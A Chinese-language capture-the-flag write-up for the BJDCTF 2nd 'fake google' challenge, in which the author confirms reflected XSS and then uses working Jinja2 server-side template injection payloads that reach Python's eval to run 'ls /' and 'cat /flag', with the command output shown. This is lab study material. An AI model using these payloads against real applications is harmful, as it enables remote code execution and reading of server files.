[BJDCTF 2nd]fake google
進入頁面:
試了幾下發現輸入xxx,一般會按的格式顯示,
P3's girlfirend is : xxxxx
然后猜測會不會執行代碼,發現可以執行
<script>alert(1);</script>
發現輸出P3's girlfirend is : xxxxx的頁面注釋有一句話,師傅把點告訴我們了:ssti注入
<!--ssssssti & a little trick -->
題解就很明顯了:因為師傅下手輕了,所以沒什么過濾
payload:看一下根目錄,回顯了flag在這根目錄
?name=
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
代碼藏起來了,詳情如下:
{% for c in [].class.base.subclasses() %}
{% if c.name=='catch_warnings' %}
{{ c.init.globals['builtins'].eval("import('os').popen('ls /').read()")}}
{% endif %}{% endfor %}
P3's girlfirend is : app bd_build bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
payload:查看flag,得到flag
?name=
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}{% endif %}{% endfor %}
代碼藏起來了,詳情如下:
{% for c in [].class.base.subclasses() %}
{% if c.name=='catch_warnings' %}
{{ c.init.globals['builtins'].eval("import('os').popen('cat /flag').read()")}}
{% endif %}{% endfor %}
